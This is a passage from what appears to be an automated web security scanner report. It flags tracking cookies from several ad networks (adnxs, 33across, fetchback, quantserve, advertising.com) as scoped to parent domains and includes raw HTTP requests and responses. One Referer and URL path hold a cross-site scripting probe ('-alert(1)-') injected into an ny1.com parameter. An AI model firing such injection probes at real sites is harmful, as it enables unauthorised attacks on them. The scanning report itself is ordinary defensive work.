Set-Cookie: GUID=MTMwMTY4MTgzNjsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Fri, 01 Apr 2011 19:17:16 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

6.95. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:09 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dFA3AE6176FAC4414AD6FC26C726B4B15 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzohh[SfGGxSTPG0]g)KYjB)OxxeWa@`OXWJWtJP89Wx.OWd5+2cwFQvEu_U?VNEe.1#SW53T<!oY3<6rkamP*I@LFI`G=`>w]dF(EqcC?$zLiH2TB2+d)/f`cl?0hs=C.m7z/yFbOnObZlt]LK^H3->I7yc!RF=yc=*.lh56RQers3<LDv`aZF=[N-H2jgE5pj*-6Kzn_Qw_)Gv]v:0F`@WRCRV/7(tZcA$e%SQBnvWg[k/Oxe8oo4$7suyKcm<agq<-NioT*jv#>+hkn(koyI$@xIlcbCuY^q]S)9$@^$7?T>O>icEcxFmQcg@SjGy%!D_Kthv?c*<56:6p1QoN<EL4A1$7g`:5trC_viK4yYiya?)7vmaJjdOW_+E'HIg[ilWJVq[ag@QIsLhPwc2sp!4)F#C2.J#2W%w3Ug`dIJ=M`3_k@@(?dQ:6?*mF8!>^5)CsN:qmv`jA3(p+6s6h/ngXK3+pto1zHNCij/C`YYAZZ/U09GS04naddKp?/3BSG8:/PZw23[sjc/x[2Ue:Ee3wOMlF>[hMH!gK`r+3brZu8_gou(7k8He3uUDf3/x9dKBy)q?eIG1X:Y=_MO7f%lc7SHY^wTkW9p-(VMCu75L2V3MO1#-WHMZ-OF?D.ML)?LvQf@hV$4zOqjF>wwp@C7q2@SB.6``XUXjkTw[7kv7Yz_qoni9pF#pL9WI_IwHeT2A$OB242[S1>>*F%5GnJKHCmqv'FmM`p

Response

6.96. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D6637385404%3As1%3D1297862555444%3Ats%3D1301676954542%3As2.33%3D%2C7652%2C2751%2C4402%2C6571%2C7051%2C6561%2C4411%2C2741%2C5482%2C571%2C7673%2C6581%2C8292%2C7621%2C6531%2C8302%2C8171%2C2231%2C3321%2C4381%2C7101%2C5452%2C8181%2C4911%2C8312%2C5441%2C2812%2C5913%2C7591%2C3761%2C2802%2C3773%2C7111%2C5431%2C5903%2C7131%2C1051%2C3203%2C5421%2C4451%2C6651%2C7121%2C5411%2C6641%2C5891%2C2791%2C4941%2C581%2C4432%2C7562%2C8232%2C3741%2C5941%2C8111%2C7142%2C591%2C1061%2C4441%2C7161%2C6622%2C8243%2C4421%2C2762%2C5391%2C601%2C3241%2C8121%2C3721%2C5381%2C5922%2C6432%2C5021%2C3711%2C7531%2C6111%2C7521%2C6932%2C5601%2C6091%2C7543%2C6941%2C6461%2C5591%2C6131%2C8043%2C8431%2C5051%2C8423%2C6952%2C4501%2C6412%2C8061%2C6961%2C7512%2C6421%2C6122%2C5581%2C4481%2C3171%2C6971%2C2571%2C8331%2C6501%2C5082%2C6981%2C202%2C6511%2C5073%2C8321%2C2142%2C6991%2C7461%2C6041%2C7961%2C4581%2C7001%2C5063%2C6471%2C6071%2C7011%2C231%2C7972%2C2652%2C5111%2C6052%2C7993%2C7031%2C6481%2C6331%2C4071%2C3521%2C6323%2C2981%2C5221%2C7902%2C3542%2C7873%2C2462%2C3551%2C6791%2C7382%2C4101%2C6841%2C5731%2C2951%2C6291%2C7391%2C3561%2C5212%2C6281%2C4051%2C2491%2C7361%2C2971%2C3571%2C2481%2C3581%2C4671%2C2962%2C5751%2C341%2C7351%2C6393%2C4681%2C2501%2C7833%2C4692%2C7811%2C5181%2C6863%2C3071%2C7821%2C6372%2C4031%2C6851%2C3481%2C5172%2C7341%2C7861%2C3491%2C4711%2C5133%2C6362%2C7321%2C5123%2C3501%2C6901%2C4723%2C7842%2C7301%2C5151%2C3512%2C5141%2C7851%2C5683%2C361%2C5351%2C7293%2C7773%2C4271%2C2311%2C2851%2C5832%2C4742%2C6201%2C951%2C7281%2C6661%2C2871%2C4281%2C5361%2C6181%2C4753%2C6191%2C7751%2C7261%2C5862%2C5312%2C921%2C6171%2C4771%2C5321%2C3911%2C7251%2C6713%2C4251%2C5873%2C6691%2C431%2C4791%2C6702%2C6152%2C5881%2C421%2C7782%2C2842%2C7711%2C3882%2C3341%2C7701%2C4802%2C7222%2C5771%2C4351%2C5781%2C7693%2C6721%2C3353%2C2933%2C6241%2C4341%2C6733%2C451%2C2941%2C7683%2C3891%2C7192%2C6771%2C5252%2C3851%2C5792%2C5261%2C5803%2C3841%2C971%2C3871%2C5811%2C7181%2C6211%2C5271%2C3391%2C7721%2C2901%2C961%2C5821%2C3861%2C6761%2C4311%2C7172%2C; Domain=.33across.com; Expires=Sat, 31-Mar-2012 16:55:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4d5af32c71c2e1a5 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh36.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D6637385404%3As1%3D1297862555444%3Ats%3D1301599606167%3As2.33%3D%2C7652%2C2751%2C4402%2C6571%2C7051%2C6561%2C2741%2C4411%2C5482%2C571%2C6581%2C7673%2C8292%2C7621%2C6531%2C8302%2C8171%2C2231%2C3321%2C4381%2C7101%2C8181%2C5451%2C4911%2C8312%2C5441%2C5912%2C2812%2C7591%2C3761%2C2802%2C3772%2C7111%2C5431%2C5903%2C7131%2C3203%2C1051%2C5421%2C4451%2C6651%2C7121%2C5411%2C2791%2C6641%2C5891%2C4941%2C581%2C4432%2C7562%2C8232%2C5941%2C3741%2C8111%2C7142%2C1061%2C4441%2C591%2C2761%2C7161%2C6622%2C4421%2C8243%2C5391%2C601%2C3241%2C5921%2C3721%2C5381%2C8122%2C6432%2C5021%2C3711%2C7531%2C7521%2C6111%2C6932%2C5601%2C6091%2C7543%2C6941%2C6461%2C5591%2C8043%2C6131%2C8431%2C5051%2C8423%2C6952%2C4501%2C6412%2C6961%2C8061%2C7512%2C6421%2C6122%2C4481%2C5581%2C3171%2C6971%2C2571%2C8331%2C6501%2C5082%2C201%2C6981%2C6511%2C5073%2C8321%2C2142%2C7461%2C6991%2C6041%2C7961%2C4581%2C7001%2C5063%2C6471%2C7011%2C6071%2C231%2C7972%2C2652%2C5111%2C6052%2C7993%2C7031%2C6481%2C6491%2C6331%2C4071%2C3521%2C2981%2C6323%2C5221%2C7902%2C7873%2C3541%2C2462%2C3551%2C6791%2C7382%2C4101%2C6841%2C5731%2C2951%2C6291%2C7391%2C3561%2C5212%2C6281%2C4051%2C2491%2C7361%2C2971%2C3571%2C2481%2C3581%2C4671%2C2962%2C5751%2C341%2C7351%2C6393%2C4681%2C2501%2C7833%2C4691%2C7811%2C6863%2C5181%2C3071%2C7821%2C6372%2C4031%2C6851%2C3481%2C5172%2C7341%2C3491%2C7861%2C5133%2C4711%2C6361%2C7321%2C5123%2C3501%2C6901%2C4723%2C7842%2C7301%2C5151%2C3512%2C5683%2C5141%2C361%2C7851%2C5351%2C7293%2C2311%2C4271%2C7773%2C2851%2C5832%2C4742%2C6201%2C951%2C7281%2C6661%2C2871%2C4281%2C6181%2C5361%2C4753%2C6191%2C7751%2C7261%2C5862%2C921%2C6171%2C3911%2C4771%2C5321%2C6712%2C7251%2C4251%2C5873%2C6691%2C431%2C4791%2C6152%2C6702%2C5881%2C421%2C7782%2C2841%2C7711%2C3882%2C3341%2C7701%2C4801%2C7222%2C5771%2C4351%2C6721%2C5781%2C7692%2C3353%2C2933%2C6241%2C4341%2C5311%2C2941%2C6733%2C451%2C3891%2C7683%2C7192%2C6771%2C5252%2C3851%2C5792%2C5802%2C5261%2C3841%2C3871%2C971%2C7181%2C5811%2C6211%2C5271%2C7721%2C3391%2C2901%2C4311%2C6761%2C961%2C5821%2C3861%2C7172%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D6637385404%3As1%3D1297862555444%3Ats%3D1301676954542%3As2.33%3D%2C7652%2C2751%2C4402%2C6571%2C7051%2C6561%2C4411%2C2741%2C5482%2C571%2C7673%2C6581%2C8292%2C7621%2C6531%2C8302%2C8171%2C2231%2C3321%2C4381%2C7101%2C5452%2C8181%2C4911%2C8312%2C5441%2C2812%2C5913%2C7591%2C3761%2C2802%2C3773%2C7111%2C5431%2C5903%2C7131%2C1051%2C3203%2C5421%2C4451%2C6651%2C7121%2C5411%2C6641%2C5891%2C2791%2C4941%2C581%2C4432%2C7562%2C8232%2C3741%2C5941%2C8111%2C7142%2C591%2C1061%2C4441%2C7161%2C6622%2C8243%2C4421%2C2762%2C5391%2C601%2C3241%2C8121%2C3721%2C5381%2C5922%2C6432%2C5021%2C3711%2C7531%2C6111%2C7521%2C6932%2C5601%2C6091%2C7543%2C6941%2C6461%2C5591%2C6131%2C8043%2C8431%2C5051%2C8423%2C6952%2C4501%2C6412%2C8061%2C6961%2C7512%2C6421%2C6122%2C5581%2C4481%2C3171%2C6971%2C2571%2C8331%2C6501%2C5082%2C6981%2C202%2C6511%2C5073%2C8321%2C2142%2C6991%2C7461%2C6041%2C7961%2C4581%2C7001%2C5063%2C6471%2C6071%2C7011%2C231%2C7972%2C2652%2C5111%2C6052%2C7993%2C7031%2C6481%2C6331%2C4071%2C3521%2C6323%2C2981%2C5221%2C7902%2C3542%2C7873%2C2462%2C3551%2C6791%2C7382%2C4101%2C6841%2C5731%2C2951%2C6291%2C7391%2C3561%2C5212%2C6281%2C4051%2C2491%2C7361%2C2971%2C3571%2C2481%2C3581%2C4671%2C2962%2C5751%2C341%2C7351%2C6393%2C4681%2C2501%2C7833%2C4692%2C7811%2C5181%2C6863%2C3071%2C7821%2C6372%2C4031%2C6851%2C3481%2C5172%2C7341%2C7861%2C3491%2C4711%2C5133%2C6362%2C7321%2C5123%2C3501%2C6901%2C4723%2C7842%2C7301%2C5151%2C3512%2C5141%2C7851%2C5683%2C361%2C5351%2C7293%2C7773%2C4271%2C2311%2C2851%2C5832%2C4742%2C6201%2C951%2C7281%2C6661%2C2871%2C4281%2C5361%2C6181%2C4753%2C6191%2C7751%2C7261%2C5862%2C5312%2C921%2C6171%2C4771%2C5321%2C3911%2C7251%2C6713%2C4251%2C5873%2C6691%2C431%2C4791%2C6702%2C6152%2C5881%2C421%2C7782%2C2842%2C7711%2C3882%2C3341%2C7701%2C4802%2C7222%2C5771%2C4351%2C5781%2C7693%2C6721%2C3353%2C2933%2C6241%2C4341%2C6733%2C451%2C2941%2C7683%2C3891%2C7192%2C6771%2C5252%2C3851%2C5792%2C5261%2C5803%2C3841%2C971%2C3871%2C5811%2C7181%2C6211%2C5271%2C3391%2C7721%2C2901%2C961%2C5821%2C3861%2C6761%2C4311%2C7172%2C; Domain=.33across.com; Expires=Sat, 31-Mar-2012 16:55:54 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Fri, 01 Apr 2011 16:55:54 GMT
Connection: close
Server: 33XG5

GIF89a.............!...
...,...........L..;

6.97. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cmp=1_1301677306_11259:0_10164:1266120_10638:1266120_10640:1266120_10641:1266120_1437:1266120_8900:1266159_9081:1374736_9085:1374736_8956:1374736_9083:1374759_9084:1374759_8956:1374759_20:2507582; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
uid=1_1301677306_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
kwd=1_1301677306_11317:1266120_11717:1266120_11718:1266120_11719:1266120_11722:1374755_10827:1374755_10842:1374759_10839:1374759_10824:1374959; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
sit=1_1301677306_3047:0:0_2701:1266159:1266159_719:1266241:1266120_2707:1374959:1374736_3225:1656397:1656397_828:2178912:2178912_11:2582837:2507582_3314:2586575:2505491_3289:2587825:2582338_2002:3814985:3813764; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
cre=1_1301677306_20056:6436:8:683890_15292:30504:1:845883_19000:38838:1:845896_20053:24803:11:1035158_20054:24802:1:1035558_14598:11789:1:2308702; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
bpd=1_1301677306_h9i9:Aq3r; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
apd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
scg=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
ppd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
afl=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3047 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300993416_20056:6436:8:0_15292:30504:1:161993_19000:38838:1:162006_20053:24803:11:351268_20054:24802:1:351668_14598:11789:1:1624812; kwd=1_1300993416_11317:582230_11717:582230_11718:582230_11719:582230_11722:690865_10827:690865_10842:690869_10839:690869_10824:691069; scg=1_1300993416; ppd=1_1300993416; uid=1_1300993418_1297862321306:0415785655118336; eng=1_1300993418_20056:0

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1301677306_11259:0_10164:1266120_10638:1266120_10640:1266120_10641:1266120_1437:1266120_8900:1266159_9081:1374736_9085:1374736_8956:1374736_9083:1374759_9084:1374759_8956:1374759_20:2507582; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: uid=1_1301677306_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: kwd=1_1301677306_11317:1266120_11717:1266120_11718:1266120_11719:1266120_11722:1374755_10827:1374755_10842:1374759_10839:1374759_10824:1374959; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: sit=1_1301677306_3047:0:0_2701:1266159:1266159_719:1266241:1266120_2707:1374959:1374736_3225:1656397:1656397_828:2178912:2178912_11:2582837:2507582_3314:2586575:2505491_3289:2587825:2582338_2002:3814985:3813764; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: cre=1_1301677306_20056:6436:8:683890_15292:30504:1:845883_19000:38838:1:845896_20053:24803:11:1035158_20054:24802:1:1035558_14598:11789:1:2308702; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: bpd=1_1301677306_h9i9:Aq3r; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: apd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: scg=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: ppd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Set-Cookie: afl=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 01 Apr 2011 17:01:46 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290


<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

6.98. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EAIAEc45slG6iR6aEAG4AQG0BoGyDBmtEM_B0T4eWUt6WrGTDhmxPHTfeWDHAAtw5w8ftYHRAg7Ck94ZIxAhCRAAQQKdLEltSlJBMlwk0lAyxqb8GSAbW27RhJehLTANqSDS45sdL5Hi1eIA; expires=Thu, 30-Jun-2011 18:10:37 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1700326699;fpan=1;fpa=P0-1950979459-1301681475347;ns=1;url=http%3A%2F%2Fwww.beatthetraffic.com%2Fwidgets%2Ftraveltimes.aspx%3Fregionid%3D15%26customerid%3D6453%26partner%3DTWC_NewYork%26inrix%3D1%26items%3D3%26link%3D%26code%3D0%26ts%3D4%26rc%3Dfalse;ref=http%3A%2F%2Fwww.ny1.com%2FContent%2FServeContent.aspx%3Fiframe%3D1%26id%3D904;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1301681475345;tzo=300;a=p-d7VfOy4jYB9T6 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EEUAEc45slG6iR6aEAG8AQG0BoGyDBmtEM_B0T4eWU6igg4ZsTx033lgxwALcOcPH7WB0QIOwpPeGSMQIQkQAEECnSxJbUpSQTJcJNJQMsam_BkgGFsS9LKFUMoXl6EtMA2pINLjmx0vkeLV4gA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EMON1
Set-Cookie: d=EAIAEc45slG6iR6aEAG4AQG0BoGyDBmtEM_B0T4eWUt6WrGTDhmxPHTfeWDHAAtw5w8ftYHRAg7Ck94ZIxAhCRAAQQKdLEltSlJBMlwk0lAyxqb8GSAbW27RhJehLTANqSDS45sdL5Hi1eIA; expires=Thu, 30-Jun-2011 18:10:37 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 01 Apr 2011 18:10:37 GMT
Server: QS

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BkRFW2EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
ROLL=AfAid6Nga0dM2aDL/oJpfu+3b1ZWiJF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
15423922=_4d961519,5531881864,775632^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BYRFW2EBAAAABAAAAIAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAic6Nga0dM2aDL/oJpfuO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956559.775632.0XMC
Set-Cookie: F1=BkRFW2EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
Set-Cookie: ROLL=AfAid6Nga0dM2aDL/oJpfu+3b1ZWiJF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
Set-Cookie: 15423922=_4d961519,5531881864,775632^956559^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:33 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775632/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
